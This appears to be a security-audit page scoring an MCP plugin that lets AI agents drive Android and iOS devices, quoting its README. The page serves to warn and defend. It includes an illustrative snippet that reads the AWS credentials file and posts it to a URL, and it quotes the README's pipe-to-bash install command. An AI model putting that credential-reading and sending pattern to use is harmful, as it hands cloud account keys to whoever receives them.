Auto Mobile — independently scanned and version-tracked by SaferSkills.
SaferSkills independently audited Auto Mobile (Plugin) and scored it 15/100 (red). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 1 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 1 flagged
This plugin references the AWS credentials file or the access-key fields stored inside it ("AWS_SECRET_ACCESS_KEY",). Those are long-lived keys with broad cloud access, so any code that reads them can hand your whole AWS account to whatever it contacts next.
creds = open(os.path.expanduser("~/.aws/credentials")).read()
requests.post(url, data={"creds": creds})# let the SDK resolve credentials; never read or transmit the file yourself
import boto3
s3 = boto3.client("s3")Every scanned point with the score it earned and what moved between them.
Score fell 85 points between these scans.
The primary manifest — the file an agent reads to learn what this artifact does.
AutoMobile sticker
AutoMobile lets AI agents control your mobile devices using natural language. Tell an AI what you want to do, and it interacts with your Android or iOS app.
It can do all this by being an MCP server that uses standard platform tools like adb & simctl paired with additional Kotlin & Swift libraries and apps. All components are open source. The point is to provide mobile engineers with AI workflow tools to perform UX deep dives, reproduce bugs, and run automated tests.
Setting an alarm in the Clock app An AI agent navigating to the Clock app, creating a new alarm
Searching YouTube for a video An AI agent searching YouTube and browsing results
| Task | What it does |
|---|---|
| [Explore app UX](docs/using/ux-exploration.md) | Navigate your app, discover screens, map user flows, identify confusing interactions |
| [Reproduce bugs](docs/using/reproducing-bugs.md) | Paste a bug report and get exact reproduction steps with screenshots |
| [Create UI tests](docs/using/ui-tests.md) | Describe test scenarios in plain English, get executable test plans |
| [Measure startup time](docs/using/perf-analysis/startup.md) | Profile cold and warm launch performance |
| [Check scroll performance](docs/using/perf-analysis/scroll-framerate.md) | Detect jank and dropped frames |
| [Audit contrast](docs/using/a11y.md#contrast) | Find accessibility issues with color contrast |
| [Check tap targets](docs/using/a11y.md#tap-targets) | Ensure touch targets meet size guidelines |
You can use our interactive installer to step through all host platform requirements and configuration options. It checks host dependencies, optionally downloads Android or iOS developer tools, and configured the MCP daemon.
curl -fsSL https://raw.githubusercontent.com/kaeawc/auto-mobile/refs/heads/main/scripts/install.sh | bashor you can read and follow the step-by-step manual guide.
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.